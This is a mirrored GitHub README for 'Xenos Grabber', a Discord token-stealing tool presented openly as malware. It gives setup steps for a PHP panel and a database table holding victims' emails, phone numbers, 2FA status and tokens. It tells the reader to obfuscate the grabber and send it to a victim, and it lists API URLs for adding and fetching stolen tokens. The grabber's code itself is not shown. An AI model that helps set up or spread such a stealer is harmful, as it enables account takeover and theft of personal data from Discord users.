Code Monkey home page Code Monkey logo

xenos's Introduction

๐Ÿบ Xenos Grabber ๐Ÿบ

The most powerfull Discord Token Grabber

Join my Discord Serveur




Features

  • All in Interface
  • Can't delete webhook
  • Custom API for fetch/remove/add tokens
  • Login system with secret password
  • Grabber on 22 Applications/browsers
  • Very Simple Usage



Usage

For use Xenos, you need a Server accept PHP and contain a database,

  1. Put the files in your host
  2. Create database with tokens table, and this columns:
CREATE TABLE `tokens` (
  `user_id` text NOT NULL,
  `username` text NOT NULL,
  `avatar` text NOT NULL,
  `email` text NOT NULL,
  `phone` text NOT NULL,
  `badges` text NOT NULL,
  `nitro_badges` text NOT NULL,
  `twofactor` text NOT NULL,
  `token` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
  1. Make your database ip,databse name,username,password in the file Inc/database.php
  2. Setup your password in Async/login.php (its the password for access to the panel)
  3. Setup your password and your webhook in api.php at line 8 and 9.
  4. Make your host adress in Grabber/python/Xenos.py at line 5
  5. Compte and Obfusque your Grabber and send it to your victime :)
  1. Put a stars and follow me for more :)



API Working

  • Add Discord Token To Database
    • https://yourhost.com/api?type=addtoken&token=THE_VICTIME_TOKEN
  • Remove Discord Token From Database
    • https://yourhost.com/api?type=removetoken&password=YOUR_SECRET_PASSWORD&token=THE_VICTIME_TOKEN
  • Fetch Discord Token Info From Database
    • https://yourhost.com/api?type=fetchtoken&password=YOUR_SECRET_PASSWORD&token=THE_VICTIME_TOKEN



Demos

  • Login Page

  • Index Page

  • Tokens Page

Contribution Welcome License Badge Open Source Visitor Count

xenos's People

Contributors

kanekiweb avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.